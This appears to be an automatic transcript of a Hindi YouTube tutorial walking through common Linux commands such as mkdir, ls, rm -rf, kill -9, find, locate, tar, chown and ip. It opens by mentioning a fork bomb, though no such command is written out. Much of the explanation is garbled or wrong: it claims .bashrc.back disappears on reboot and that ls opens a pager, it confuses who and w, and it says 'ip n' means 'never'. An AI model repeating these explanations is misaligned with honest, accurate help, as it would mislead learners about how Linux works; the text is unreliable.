सो गाइस, मैंने एक ऐसा कमांड चलाया जिससे मेरा पूरा सिस्टम फ्रीज़ हो गया। ये है फॉग बॉम्ब। ये एक गलत कमांड और आपका लिनक्स बिल्कुल हैंग हो जाएगा। आपको सिर्फ रीस्टार्ट ही करना पड़ेगा, उसका कोई सोल्यूशन नहीं है। अब सोचो अगर आपने ये गलती रियल सिस्टम पे कर दी तो। चलो आज के वीडियो में बेसिक से लेकर एडवांस लिनक्स कमांड समझते हैं और साथ ही वो डेंजरस कमांड्स भी जो आपको कभी नहीं चलाने चाहिए। सो लेट्स बिगिन आवर वीडियो। आपका स्वागत है गाइस मेरे एक न्यू वीडियो में। आज मैं कवर करने वाला हूँ लिनक्स के कमांड्स। ये कमांड्स अगर आप जानते हैं तो आप लिनक्स में कंफर्टेबल होंगे, ठीक है। तो ये आपकी रेगुलर बेसिस पे बहुत हेल्प करेगा। पहले स्टार्ट करते हैं mkdir कमांड से। क्या है mkdir? mkdir बेसिकली एक फ़ोल्डर बनाने का कमांड है, ठीक है। अगर आपको कोई फ़ोल्डर बनाना है तो आप mkdir प्लस उसका फ़ोल्डर का नाम दे सकते हैं तो एक फ़ोल्डर बन जाएगा। PWD से आप कोई प्रेजेंट वर्किंग डायरेक्टरी देख सकते हैं कि आप कौन से पाथ में हैं, ठीक है। और यहाँ पे अभी मैं यूज़ कर रहा हूँ नैनो का। नैनो एक फ़ाइल एडिटर है जस्ट, ठीक है। आप उसको यूज़ करके किसी भी फाइल को एडिट या एक न्यू फाइल बना सकते हैं। वो एक टेक्स्ट फाइल से लेके कोई py फाइल या पाइथन का फाइल हो या कोई प्रोग्रामिंग लैंग्वेज का कोई भी फाइल आप बना सकते हैं नैनो एडिटर का यूज़ करके, ठीक है। और अब ls-l ये होता है लिस्ट करने के लिए ओनर का साइज़ डाटा क्या है उस फाइल का, ठीक है। मेरे पास सिर्फ फाइल डॉट टेक्स्ट है इस पर्टिकुलर डायरेक्टरी में, तो वही उसी का वो रीड एंड राइट परमिशंस एंड ऑल सब कुछ वो प्रिंट कर दिया है, ठीक है। अब लिस्ट ऑल LSA होता है लिस्ट ऑल करने के लिए। लिस्ट ऑल यूज़ होता है हिडन फाइल्स और समथिंग लाइक हम लोग को उसको ढूंढने के लिए, ठीक है, यूज़ होता है वो कमांड। बट यहाँ पर तो कोई हिडन फाइल है नहीं, तो मैं अपने मेन पाथ में आ गया, ठीक है। और यहाँ पर अगर मैं यूज़ करूँगा ls-a का, आप यहाँ पर देख सकते हैं एक फ़ाइल होगा .bashrc.back, ओके। ये बैकअप फाइल है, ठीक है। .back स्टार्ट होता है एक बैकअप का शॉर्ट फॉर्म, ठीक है, बैक, ओके। ये bashrc यूज़ होता है जब हम लोग कोई सेल को ओपन करेंगे। ऐसे यहाँ पे एक टर्मिनल में ओपन किया हूँ तब ये एक फ़ोल्डर बन जाता है। अगर मैं रिबूट करूँगा अपना सिस्टम तो ये ऑटोमेटिकली रिमूव हो जाएगा, ठीक है, bashrc। अब मैं आपको दिखाऊंगा जैसे ls कमांड। तो ये तो लिस्ट होता है, लिस्ट करने के लिए कुछ भी आपका फोल्डर में है अगर तो ls करेंगे तो वो लिस्ट कर देगा उसे। ये तो बहुत इजी आपको पता ही होगा। और जैसे cd कमांड आपको चेंज करने के लिए डायरेक्टरी, ठीक है। चेंज डायरेक्टरी इसका फुल फॉर्म होता है। अब pwd का फुल फॉर्म होता है प्रेजेंट वर्किंग डायरेक्टरी, ठीक है। आप किस डायरेक्टरी में भी काम कर रहे हैं, प्रेजेंट वर्किंग डायरेक्टरी उसी को बुलाया जाता है pwd, ओके। और यहाँ पे मैं अभी टच कमांड यूज़ कर रहा हूँ। तो टच कमांड का यूज़ बेसिकली ये होता है कि आप जैसे कि आपको किसी टेक्स्ट फाइल को क्रिएट करना है, तो किसी भी टेक्स्ट फाइल को क्रिएट करने के लिए आप टच कमांड का यूज़ कर सकते हैं, ओके। एम्प्टी फाइल बनाना है तो आप टच कमांड का यूज़ कर सकते हैं। और नैनो फाइल से या नैनो एडिटर से, ओके, आप उसको एडिट कर सकते हैं उस टेक्स्ट फाइल को या किसी भी प्रोग्रामिंग फाइल को। तो यहाँ पर बहुत सारा क्या बोला जाएगा, एक एडिटर होता है जैसे कि आप VS कोड एडिटर जानते हैं, उसमें आप कोड्स लिखते हैं। और हमारे पास नैनो है लिनक्स में, फिर विम होता है, ठीक है, विम कोड एडिटर, ठीक है, सब एडिटर्स है। और नियो विम होता है अगर आपको ग्राफिकल व्यू चाहिए, ठीक है। अगर आपको कोई डायरेक्टरी बनाना है, ऐसे डायरेक्टरी होता है फोल्डर, ठीक है। और एक फ़ाइल में बहुत डिफरेंस होता है। तो यहाँ पर फोल्डर और फाइल का कलर्स चेंज है। देखिए फाइल आपको दिखाई देगा कि वो ग्रीन कलर का है और फोल्डर यहाँ पे दिखाई देगा कि वो अराउंड ब्लू कलर का है, ठीक है। तो यहाँ पे डिफरेंस होता है फोल्डर और फाइल में, आपको समझना पड़ेगा, ठीक है। तो ये आप याद रखिएगा। यहाँ पे मैं एक और डायरेक्टरी बना दिया जो हैकिंग लैब है, ठीक है। अब आपको कॉपी करना है ऐसे कोई फाइल, ठीक है। अगर आपको कॉपी करना है तो आप CP लिखेंगे। CP स्टैंड्स फॉर कॉपी, ओके। ये आपको याद रखना, CP स्टैंड्स फॉर कॉपी। अब मैं कॉपी कर दिया एक टेम्परेरी फोल्डर में। टेम्परेरी फोल्डर अपने आप को रिबूट करते वक्त पूरा फिनिश फ्लैश हो जाता है, ठीक है। ये अगर आप देखेंगे ये कहाँ है, इसका पोजीशन और ये किस पाथ में है, तो मैं आपको दिखाऊंगा कि फ़ाइल कॉपी हुआ है कि नहीं। LS करने पे पता चलता है कि फ़ाइल मेरे पास है लेकिन वो कॉपी हुआ है कहीं। तो मैं अगर जाऊंगा cd/temp पाथ पे, ये पाथ चेंज करने का तरीका आपको पता होना चाहिए। स्लैश दे के आप किसी भी पाथ का नाम लिखेंगे तो वो पाथ पे आप जा सकते हैं।
पाथ होता है मीन्स कौन सा फोल्डर, कौन सी जगह में आपको जाना है, ठीक है। अब मैं यहाँ पर हूँ, मैं ls किया तो आप देख सकते हैं फाइल डॉट टेक्स्ट मुझे शो कर रहा है, ठीक है। तो इससे पता चलता है कि मैं अभी टेम्प्रेरी पाथ में हूँ, ओके। सो मैं अगर इसे रिमूव करना चाहता हूँ, फोर्सफुली मुझे रिमूव करना है, रिकर्सिवली एंड फोर्सफुली, ठीक है। यहाँ पर rm रिमूव होता है स्टैंड, ठीक है, rm इक्वल टू रिमूव एंड r इक्वल टू रिकर्सिव एंड f इक्वल टू फोर्सफुली। अगर मैं cd करूँगा तो मैं सबसे अपने लास्ट डायरेक्टरी में आ जाऊँगा, ओके। रूट ट्री होता है, रूट ट्री के सबसे टॉप में आ जाऊँगा, ठीक है। यहाँ पर लिनक्स ट्री को जो फॉलो करता है वो एक अपसाइड डाउन ट्री है, मीन्स अगर आप किसी भी ट्री को देखेंगे वो कैसे ग्रो होता है, उसको आप अपसाइड डाउन कर दीजिए तो वो हो जाता है एक ट्री जो लिनक्स फॉलो करता है, ठीक है। आपको ये याद रखना है। अगर मुझे किसी भी टेक्स्ट फाइल का या किसी भी फाइल का नाम चेंज करना है, ठीक है, डायरेक्टरी हो, तो मैं mv कमांड का यूज़ करता हूँ। मैं notepad.txt का नाम चेंज करके done.txt कर दिया, ठीक है। अगर अब मुझे कोई done.txt हो या कोई भी टेक्स्ट फाइल या कुछ भी फाइल को रिमूव करना है, ठीक है, तो मैं डिलीट करने के लिए सिंपली rm कमांड का भी यूज़ कर सकता हूँ। सो यहाँ पे rm-rf या rm कमांड डिफरेंट होता है, ठीक है, एक दूसरे से। rm जस्ट एक कमांड है जो डिलीट करेगा, रिमूव रिकर्सिवली नहीं करेगा और फोर्सफुली नहीं करेगा, बस ये रिमूव कर देगा, ठीक है। तो आपको याद रखना पड़ेगा ये सब चीज़, ये सब बहुत सिंपल चीज़ है। तो यहाँ पे मैं अभी देखिए एक फोल्डर को रिमूव किया तो यहाँ पे मैं r का यूज़ किया, ठीक है, rm-r। यहाँ पे मैं रिकर्सिवली उसे डिलीट किया, ठीक है, मैं फोर्सफुली नहीं कर रहा हूँ, बस रिकर्सिवली कर रहा हूँ। तो यहाँ पे 3 टाइप के कमांड्स हैं, आप उसको पर्टिकुलरली आप यूज़ करके देख सकते हैं, rm-r-rf ऐसे करके, ठीक है, और सिर्फ rm भी है। अब मेरे पास फाइल डॉट टेक्स्ट है, अगर मैं हु एम आई करूँगा तो मुझे पता चलेगा कि मैं कौन हूँ, मैं काली हूँ, ठीक है। यूज़र नेम ये शो कर देगा, ठीक है, हु एम आई, हु आर यू, ऐसे करके, ठीक है। आईडी, ये आईडी कमांड होता है यूज़र का यूआईडी, जीआईडी, कौन से ग्रुप से बिलोंग करता है यूज़र, ये सब देखने के लिए। अब यू नेम अगर मैं यूज़ करूँगा तो एक कर्नल का नेम शो करता है, ठीक है, एग्जाम्पल लिनक्स और या लिनक्स रूट, ये सब शो करेगा कर्नल का नाम, ठीक है, नेम बेसिकली। अगर मैं uname-a करूँगा स्पेस देके, ये सिस्टम का फुल इंफॉर्मेशन, कर्नल का नेम, फिर होस्ट नेम, कर्नल का वर्जन, डेट, आर्किटेक्चर, सब कुछ ये शो करेगा, ठीक है। और अप टाइम अगर मैं लिखूँगा तो अप टाइम में ये बेसिकली शो करता है मशीन का किस टाइम से ये चल रहा है, मशीन कब से ये चल रहा है, ठीक है, कितने मिनट से कितने आवर्स से अप है मशीन, तो अप टाइम यूज़ होता है। अगर मैं सिर्फ हु लिखूँ, ठीक है, तो ये दिखाता है कब लॉग्ड हुआ था, ठीक है, मशीन पे कोई लॉग्ड हुआ कि नहीं, अभी कोई है कि नहीं, राइट नाउ इफ़ एनीवन इज़ प्रेजेंट और नॉट, ठीक है, कोई है कि नहीं उस मशीन पे, तो ये दिखा देगा, ठीक है। और हु एंड w अगर मैं यूज़ करूँ तो ये दिखाता है कि ये दोनों अलग अलग कमांड है। w यूज़ होता है सेपरेट कमांड लॉक करने के लिए कि क्या प्रोसेसेस रन हो रहे हैं, और बैकग्राउंड में क्या हो रहा है ये सब दिखाने के लिए हु यूज़ होता है। तो यहाँ पर हु एंड होता है रन द हु कमांड इज़ द बैकग्राउंड, ओके। तो ये हु कमांड बैकग्राउंड है, w जो है वो सेपरेट कमांड है, सोज हु इज़ लॉग्ड इन, ओके। सो बेसिकली कौन लॉग्ड इन है, ठीक है, ये दिखाता है। एंड व्हाट दे आर डूइंग, प्रोसेस इन्फॉर्मेशन, सो प्रोसेस इन्फॉर्मेशन दिखाता है, दोनों मिल के ही काम करते हैं एक दूसरे का। और पासवर्ड्स अगर मैं लिखूंगा तो ये पासवर्ड चेंज करने के लिए मुझे हेल्प करता है। सी यहाँ पे देख रहे हैं आप, चेंजिंग पासवर्ड ऑफ काली, मैं चेंज कर सकता हूँ। यहाँ पे फिर से लिस्ट कमांड में यूज़ किया तो लिस्ट करने के लिए कुछ भी पासवर्ड, फाइल वगैरह या जो भी है, ठीक है। अगर मैं कैट कमांड का यूज़ करूँ तो मैं देख पाऊंगा कि उस फाइल डॉट टेक्स्ट में क्या है, ठीक है, ये प्रिंट कर देगा उस टेक्स्ट फाइल को, ठीक। आप याद रखिए टेक्स्ट फाइल को कैसे प्रिंट किया था। अगर मैं ls कमांड यूज़ करूँ, ठीक है, ये एक पेजर में फाइल को ओपन करता है। अगर मैं इसे स्क्रॉल करूँ अप और डाउन, मैं देख सकता हूँ अगर कोई लार्ज फाइल है, टेक्स्ट फाइल, तो ये पेजर में अब मैं देख पाऊंगा उसे, ठीक है। ये एक पेजर खुल गया, ठीक है। अब मुझे यहाँ से क्विट करना है तो मैं क्यू क्लिक करके करूँगा तो क्विट हो जाएगा, ठीक है, क्यू इक्वल टू क्विट, ओके। अगर मुझे एक और कमांड है, देखिए यहाँ पे head-n10 फाइल डॉट टेक्स्ट, ये दिखाएगा कि मेरे फर्स्ट 10 लिस्ट में जो वर्ड्स है वो प्रिंट कर देगा हेड कमांड से, ठीक है। और यहाँ पे मैं देखूँगा ये 4 ही प्रिंट किया, क्योंकि मेरे पास 4 ही कैरेक्टर्स है पहले, तो ये उसी को प्रिंट किया, ठीक है। अब अगर मैं यहाँ पे ऐड ऑन कर दिया कुछ कैरेक्टर्स, ठीक है, ये तो फर्स्ट 10 है उसी को ये प्रिंट करेगा, ठीक है, फर्स्ट 10 को ही प्रिंट करेगा, लास्ट को ये प्रिंट नहीं करेगा, ठीक है।
और इसके बाद एक कमांड है जो, या देखिए आप ये फर्स्ट 10 को ही प्रिंट किया, ठीक है। और अगर आपको अब देखना है कि मेरे सिस्टम में कौन कौन लास्ट लॉगिन किया था, या var log wtmp, यहाँ से अगर आपको पता करना है कि कहाँ से मेरे सिस्टम में कौन कौन लॉग किया था, तो ये आप इस कमांड को यूज़ कर सकते हैं। फाइल डॉट टेक्स्ट मत यूज़ करिएगा, उसे हटा दीजिएगा, ठीक है। ये फाइल का नहीं, ये पूरे सिस्टम का बताएगा कि कौन लास्ट लॉगिन किया था, ठीक है। 10 लॉगिन अटेम्प्ट जो भी था, ठीक है, उस सिस्टम का, इट मीन्स दैट 10 मीन्स लास्ट 10 एंट्रीज, ठीक है। लास्ट 10 एंट्री जो था उसके हिसाब से आप देख सकते हैं। अगर आपको फाइल में देखना है लास्ट 10 कौन कौन सा डिजिट है, तो यहाँ पे आप टेल यूज़ करके -n, हेड नहीं यूज़ करिएगा, टेल यूज़ करिएगा, ठीक है। तो आप लास्ट 10 डिजिट्स किसी भी एक लाइन का जो रो या कॉलम होता है, कॉलम का पूरा ये देख पाइएगा आपकी कौन कौन सा लिस्ट में है मेरे, ठीक है, लाइन्स में। तो 10 लाइन्स ये प्रिंट कर देगा, टेल -f फाइल डॉट टेक्स्ट, ओके। सो यहाँ पे ये न्यू लाइन दिखाएगा -f में, ठीक है। फॉलो द फाइल, सो न्यू लाइन्स, ओके। f स्टैंड्स फॉर देयर वी कैन लाइक आर एडेड यूजफुल फॉर लॉक्स, ओके। लॉक्स के लिए बहुत यूज़फुल होता है, ठीक है। तो यहाँ पर मैं दिखाया कि एक लास्ट करके कमांड था जो वो सिस्टम के लिए यूज़ होता है, ठीक है। सिस्टम के आप देखेंगे एक from/var/log/wtmp को, वहाँ से जो लास्ट 10 एंट्रीज था वो उसको दिखाएगा, ठीक है। ये नोट्स के लिए या टेक्स्ट फाइल का यूज़ नहीं होता है, ठीक है, आपको ये याद रखना पड़ेगा। अगर मैं ps ऑक्स करूँ, ठीक है, ps ऑक्स हेड या ps ऑक्स करूँ, तो ये दिखाएगा कि क्या मेरे स्नैपशॉट दिखाया रनिंग कुछ प्रोसेसेस का, ठीक है। ये बहुत सारा इन्फॉर्मेशन होता है यूज़र का, PID का, CPU का, मेम का, कमांड का, ठीक है, ऐसे टाइप का होता है। अगर हेड करूँगा ps ऑक्स हेड, तो वो भी वही स्कोर बोर्ड दिखाएगा, समझ लीजिए। अगर मैं टॉप करूँगा तो ये रियल टाइम में प्रोसेस मुझे दिखाएगा, रियल टाइम में क्या प्रोसेसेस हो रहा है, ठीक है, CPU का, मेमोरी का, यूजिंग प्रोसेसेस। अगर मैं Q क्लिक करूँगा तो क्विट हो जाएगा, ठीक है। ये इंटरैक्टिव होता है, रियल टाइम प्रोसेसेस को शो करता है, टॉप कमांड, ठीक है, टॉप कमांड। और ये जो ps ऑक्स है ये दिखाता है स्नैपशॉट्स, बेसिकली ऑल रनिंग प्रोसेसेस का, सारा रनिंग प्रोसेसेस का एक स्नैपशॉट दिखाएगा आपको, यूज़र PID ऐसे करके, ठीक है। दोनों डिफरेंस है, टॉप और ps ऑक्स, आपको समझ में आ गया होगा होपफुली। सो आप अगर PS करिएगा तो ये आपको सारा प्रोसेसेस दिखा देगा। अगर आपको PS कर लिए तो किल करना है आपको, अगर तो आप किल कमांड को भी यूज़ कर सकते हैं, बट आपको PS करके पहले देखना पड़ेगा कि क्या है PID। तो आपको PID नहीं पता है तो आप PS करके पहले PID देख लीजिए, प्रोसेसेस का कौन कौन सा प्रोसेसेस है। ZSH चल रहा है, विच मीन्स एक टर्मिनल चल रहा है, या लेस है, या टेल है, या टॉप, जो भी हम यूज़ किए थे उसका प्रोसेस ID होता है। अगर मुझे किसी को किल करना है, ठीक है, तो मैं यहाँ पे किल डैश स्पेस दे के 9 और उसका PID नंबर लिख दूंगा, तो ये तो फोर्स किल हो जाएगा, ठीक है। प्रोसेस को फोर्सली किल कर देगा, ठीक है, यूजिंग सिग्नल 9, ओके। सिग किल, इसे सिग किल बुलाया जाता है, सिग्नल 9 किल, ओके। तो सिग किल आपको पता रहना चाहिए, ये आप याद रखिएगा। DF-H होता है डिस्क फ्री करने के लिए, देखने के लिए कि कितने स्पेस है मेरे डिस्क में, ओके। डिस्क मीन्स बेसिकली और SSD और हार्ड डिस्क जो भी है आपके लैपटॉप में या कंप्यूटर में, आपको वो दिखाएगा। ये लिनक्स में आप DF-H यूज़ करके देख सकते हैं, ठीक है। माउंटेड फाइल सिस्टम में क्या है आपका, H मीन्स ह्यूमन रीडेबल। यहाँ पे वैसे ही आपको रैम के बारे में अगर इन्फॉर्मेशन देखना है, कितनी स्वैप रैम है आपका, टोटल कितना रैम है, तो free-H करके देख सकते हैं। सोज रैम एंड स्वैप यूजेज ह्यूमन रीडेबल फॉर्म, ओके। ह्यूमन रीडेबल फॉर्म मीन्स -H करेंगे तो आपको ह्यूमन रीडेबल फॉर्म में दिखाएगा। अगर आपको ट्रेस रूट google.com, ये एक बेसिकली नेटवर्किंग कमांड है, ये पाथ दिखाएगा कि google.com को रीच करने के लिए मेरा जो पैकेट है वो कहाँ कहाँ से गया, ठीक है, क्या क्या पाथ यूज़ किया वो google.com रीच करने के लिए, कौन कौन से राउटर से पास होके गया कि google.com रीच हो जाए, ठीक है। अगर आपको किसी को ग्रेप करना है, किसी फाइल को, ग्रेप मीन्स पकड़ना, ठीक है, आपको पकड़ना है किसी को, तो ग्रेप का क्या होगा यूज़, आपको ग्रेप समझ लीजिए हेलो करना है कि हेलो कुछ वर्ड बोल के है कि नहीं एक फाइल में, ठीक है। आप कैसे चेक करिए, आप ग्रेप कमांड यूज़ करिए। अगर मैं ग्रेप करूँगा हेलो को, फाइल डॉट टेक्स्ट में ग्रेप है कि नहीं मुझे चेक करना है, ये प्रिंट कर देगा उसे, ये हाँ हेलो है,
अगर आपको फिर से चेक करना है कि अगर मेरे पास ये हेलो एक वर्ड आएगा या कुछ भी ये है कि नहीं फाइल डॉट टेक्स्ट में, तब आप चेक करिएगा, तब आपको पता चलेगा कि नहीं वो नहीं है, वो प्रिंट नहीं करेगा उसे। अब अगर आपको किसी को फाइल को फाइंड करना है, ठीक है, जैसे वो config.php हो गया या कुछ भी हो गया, आपको फाइंड करना है, ठीक है, तो यहाँ पर अगर मैं सूडो के बिना करूँगा उसे फाइंड, ठीक है, तो क्या होगा, ये सर्च करेगा, ठीक है, उस फाइल्स को सर्च करेगा, बट कुछ कुछ परमिशन डिनाइड हो जाएंगे। यहाँ पे मैं नेम दे दे रहा हूँ, नेम में मैं डबल कोलोन में देखूँगा इसे config.php दे दूंगा, ठीक है, इसी को मुझे फाइंड करना है कि कुछ है कि नहीं ऐसा बोल के। तो ये परमिशन डिनाइड दे रहा है क्योंकि मैं सूडो यूज़ किया नहीं, ठीक है, ये स्लो हो सकता है क्योंकि परमिशन डिनाइड हो रहा है। परमिशन डिनाइड मैसेज यूजलेस अनलेस यू यूज सूडो, ओके, सो अनलेस यू यूज सूडो इट कैन बी ईजी। अगर आप सूडो यूज़ करेंगे तब ठीक रहेगा, अगर आप सूडो यूज़ नहीं कर रहे फाइंड यूज़ करेंगे config.php फाइंड करने के लिए, यहाँ पे मिल गया है मुझे, बट अगर आपको फाइंड करना है इजीली तो यहाँ पे प्रॉब्लम होगा, ठीक है। अगर अब जैसे मुझे यहाँ पर एक और कमांड है, तो ये स्टार्ट होगा रूट से .config फाइंड करना है, ठीक है, तो और ये ऑफन फाइंड करेगा यूज़र कॉन्फ़िग डायरेक्टरी सेम नोड, ठीक है। अगर आपको सेम नोड बोलूँगा कि ये सूडो आपको यूज़ करना चाहिए अगर आपको फाइंड का कमांड यूज़ करना है तो, ठीक है, तो याद रखिएगा किसी को कुछ भी फाइंड करना है, वो कुछ भी हो एक्सटेंशन उसका, तो आप सूडो यूज़ करिएगा, ठीक है। अब यहाँ पे लोकेट क्या करता है, लोकेट भी फाइंड करने के लिए यूज़ होता है, लेकिन एक लोकल डाटाबेस का यूज़ करता है, ठीक है। अगर मुझे फाइंड करना है IDRSA, ठीक है, ये होता है क्या कि ये पाथ को यूज़ करता है डाटाबेस का, ठीक है। अभी कुछ डाटाबेस है कि नहीं, अगर आपको डाटाबेस यूज़ करना है, ठीक है, तो ये फास्टर होता है, ठीक है, फाइंड से, तो आपको उसको अपडेट करते रहना पड़ेगा, ठीक है। अपडेट DB एक कमांड होता है, तो उसको आप कर दीजिएगा तो अपडेट हो जाएगा लोकल डाटाबेस आपका। तो ये IDRSA जो मैं फाइंड कर रहा था ये बहुत इंपॉर्टेंट होता है, ये फास्टर होता है फाइंड कमांड से, बट IDRSA किसी को मत दीजिए, वो एक फाइल होता है वो अच्छा बहुत ये होता है, ठीक है, इंपॉर्टेंट फाइल होता है। हिस्ट्री कमांड से मुझे पता चलेगा कि मेरे कितने कमांड यूज़ किए हुए, टोटल 2167 थे, आप देख लिए। अगर मैं ls-l करूँगा फाइल डॉट टेक्स्ट के बारे में, मुझे पता चल जाएगा कि क्या क्या परमिशन दिया हुआ है। ये ओनरशिप काली मीन्स दैट एक लोकल ओनर है, ठीक है, कुछ भी रूटेड नहीं है, रूटेड परमिशन नहीं है, मुझे मैं लोकल ओनर हूँ, ठीक है। तो लोकल ओनर हूँ बेसिकली ये शो करता है इन्फॉर्मेशन की ls-l से, ठीक है, ये शो करेगा। अगर मैं आप यहाँ पे कमांड देख रहे हैं चेंज ओनरशिप का, ठीक है, CHOWN विच मीन्स चेंज ओनरशिप, ठीक। तो चेंज ओनरशिप अगर मैं करूँगा फाइल डॉट टेक्स्ट का रूट कर दूंगा, ठीक है, ओनरशिप को। ऑपरेशन नॉट परमिटेड बिकॉज हम सूडो यूज़ किए नहीं, ठीक है, सूडो मुझे यूज़ करना पड़ेगा। तो यहाँ पे मैं सूडो यूज़ करके अगर CHOWN करूँगा, ठीक है, तो मुझे यहाँ पे रूट परमिशन मिल जाएगा। मैं ओनरशिप को रूट कर दिया, ठीक है। अगर मुझे समझ लीजिए मैं पहले एक स्टूडेंट के पास था, अब ये प्रिंसिपल के पास चला गया, तो रूट ओनरशिप हो गया, ठीक है। यहाँ पे अगर आप मुझे अब ये एडिट करना है ओपन करना होगा तो मुझे सूडो लगा के ओपन करना पड़ेगा, ठीक है। अब मुझे किसी फाइल को बनाना है, समझ लीजिए फोल्डर बनाना है, ठीक है, सॉरी। तो फोल्डर बनाने के लिए मैं क्या यूज़ करूँगा, MKDIR, तो मैं PWD करता हूँ तो क्लाउड बोल के एक फोल्डर बन गया है, ठीक है। अब मुझे उसको ये करना है, जिप करना है, ठीक है, ये कंप्रेस कर देगा इसे। मैं पे फ्लैग यूज़ कर रहा हूँ CZF, ओके, और cloud.tar.gz, और मुझे क्लाउड को करना है यहाँ पे कंप्रेस। तो ये कंप्रेस करके एक टारबोल बनाया था, ठीक है। टारबोल बेसिकली एक बैग के अंदर सारा फाइल को रख देना और उसे क्लोज कर देना, तो एक GZ फाइल बन गया, ठीक है। ये पूरे उस फोल्डर को एक tar.gz में बंद कर दिया है, ठीक है। तो यहाँ पे -CZF का मतलब बनाना, ठीक है, अगर मुझे किसी को बनाना है, और यहाँ पे XZF का मतलब है मतलब एक्सट्रैक्ट करना, ठीक है। अब मैं इसे एक्सट्रैक्ट करूँगा तो XZF का यूज़ करना पड़ेगा, tar XZF और cloud.tar.gz, ओके। और अब मुझे TZF का यूज़ करना है, तो ये लिस्ट कर देगा कि उसके अंदर क्या है, ठीक है, विदाउट एक्सट्रैक्टिंग। समझ लीजिए एक जिप फाइल है, बट मुझे एक्सट्रैक्ट करे बिना देखना है उसके अंदर क्या है, तो मैं TZF का यूज़ करूँगा। तो आप देख सकते हैं कैसे डिफरेंस था, ये XZF TZF ये सारा कैसे डिफरेंट था, CZF तीनों डिफरेंट है, तो आपको ये पता रहना चाहिए, ठीक है। अगर मुझे अब ऐड ऑन करना है कुछ फाइल, ठीक है, एक टेक्स्ट फाइल में पासवर्ड आप क्रैकिंग करेंगे तो ये बहुत इंपॉर्टेंट रहेगा आपको जानकर रखना, ठीक है। आपको हेलो फाइल, ये हेलो एक बोल के जो फाइल है,
अब मुझे ये वर्ड है जो ये ऐड करना है इस फाइल डॉट टेक्स्ट में, ठीक है। तो मैं कैसे ऐड करूँगा, मैं इको करूँगा, इको करके जो डबल एरो का साइन है मैं दे दूँगा, ठीक है। और फाइल डॉट टेक्स्ट में मुझे ऐड ऑन करना है तो ये ऐड हो जाएगा। अगर मैं फाइल डॉट टेक्स्ट के अंदर जाऊँगा तो आप देख सकते हैं हेलो के पहले एक H ट्रिपल क्वाड E एंड LLO, ठीक है, हेलो। तो यहाँ पर वो ऐड हो गया है। अगर मुझे फिर से अगर मुझे व्यू करना है तो नैनो कमांड से मैं व्यू कर सकता हूँ कुछ भी क्या है उस फाइल के अंदर। और यहाँ पर मैं अगर mkdir कमांड यूज़ करूँगा तो यहाँ पे मैं एक फ़ोल्डर बना रहा हूँ और मैं उसका कमांड जो एक्सेस करना है cd कमांड भी एक साथ यूज़ कर दे रहा हूँ, 2 कमांड चेन करके यूज़ कर रहा हूँ। यहाँ पर आपको ख्याल रखना है कि दोनों, अगर पहला वाला वर्क करेगा तभी दूसरा वाला वर्क करेगा, ठीक है। अगर पहला वाला वर्क नहीं किया तो दूसरा वाला वर्क नहीं करेगा। सो अब हम लोग यूज़ करेंगे कुछ नेटवर्किंग कमांड्स, तो वो भी आपको याद रखना है, वो भी बहुत इंपॉर्टेंट है। सो स्टार्टिंग विथ हु एम आई, इट टेल्स यू द यूज़र नेम, ठीक है, यूज़र नेम बताता है। उसके बाद हम लोग होस्ट नेम CTL, ये कमांड है जो सेट करता है मशीन के होस्ट नेम और सम सिस्टम इन्फॉर्मेशन, ओके, सब देता है, सब कुछ मशीन ID, आर्किटेक्चर सब कुछ बताया जाता है, ठीक है। ये समझ लीजिए कंप्यूटर का ID कार्ड है, होस्ट नेम CTL, ठीक है। अब IP एड्रेसेस एंड लिंक स्टेट, सो हम लोग यहाँ पे एक IPA जो है करके कमांड है जो ये लिस्ट करता है IP एड्रेस को, शॉर्ट फॉर्म है IP एड्रेस का, ठीक है। लिस्ट ऑल द नेटवर्क्स, ये पूरे नेटवर्क को लिस्ट कर देता है, नेटवर्क इंटरफेस एंड देयर IP एड्रेसेस, ओके। IP एड्रेस सो एथरनेट, सो मेरे पास तो एथरनेट नहीं है, मैं एथरनेट से कनेक्टेड नहीं हूँ। सो यहाँ पे WLAN अगर करूँगा तो वायरलेस नेटवर्क मैं उससे कनेक्टेड हूँ। सो ये शो करता है एड्रेसेस डिटेल ओनली फॉर एथरनेट वायर्ड एंड LAN 0 अकॉर्डिंगली। अगर LAN 0 यूज़ करेंगे तो LAN 0, एथरनेट यूज़ करेंगे तो एथरनेट, ठीक है। अब अगर हम IP लिंक शो कमांड यूज़ करेंगे, ये लिस्ट करता है इंटरफेसेस एंड लिंक लेवल इन्फॉर्मेशन, ओके। अप है कि डाउन है, नेट की मैक एड्रेस क्या है, सब कुछ ये पता कर देगा, ठीक है। IP लिंक सेट एथरनेट, बिकॉज एथरनेट तो नहीं है मेरे में, आप WLAN अगर यूज़ कर, मैं वाईफाई यूज़ कर रहा हूँ तो वायरलेस नेटवर्क होगा तो WLAN होगा, लेकिन मैं यहाँ पे दिखाया नहीं आपको, ठीक है। तो IP राउट क्या होगा, IP राउट कमांड का यूज़ केस होगा कि आपको समझिए जैसे कि कोई राउटिंग टेबल शो करना है, शोज द राउटिंग टेबल हाउ योर मशीन डिसाइड्स, लाइक वो डिसाइड करता है कहाँ से पैकेट को सेंड करना है, कैसे, ठीक है। ये एक मैप है IP राउट, समझ लीजिए राउटिंग टेबल का, ठीक है। और अगर अब हम लोग को यूज़ करना है ऐसे IP राउट ऐड, यहाँ पे एक IP है और वाया एक IP दे दिया गया है, ठीक है। तो ये ट्राई करता है कर्नल को बोलने का कि इफ़ समझ लो इस IP से जो 10.10.10.2 है पैकेट सेंड करने के लिए एज नेक्स्ट हॉप करने के लिए, ठीक है, गेटवे में। बट यहाँ पे प्रॉब्लम हो जाता है कि वो 10.10.10.IP जो मेरा एक IPv4 एड्रेस नहीं है, तो यहाँ पे प्रॉब्लम होता है हॉप करने में, नेक्स्ट हॉप करने में, बिकॉज इट्स गिव्स एन इनवैलिड गेटवे, ठीक है, एक एरर आ जाएगा, ठीक है, ऑपरेशन नॉट परमिटेड। तो यहाँ पे IP राउट करने के लिए अगर मैं यहाँ पे सूडो दूंगा, यहाँ पे सूडो देना पड़ेगा, ठीक है, ये डायरेक्टली कनेक्ट नहीं होगा क्योंकि यहाँ पे नेक्स्ट हॉप हैज़ इनवैलिड गेटवे। गेटवे के बारे में बोला था, गेटवे इनवैलिड है। यहाँ पे कर्नल के डिसाइड नहीं कर पाया कौन से इंटरफेस को यूज़ करना है, तो यहाँ पे गेटवे इनवैलिड हो गया है, ठीक है। IP में हो सकता है टीपो, IP ने मीन्स नेवर, ओके, ये नेवर स्टैंड होता है, ठीक है। ये क्या करता है, ARP एड्रेसेस को शो करता है टेबल में, IP मैक को मैपिंग्स करता है 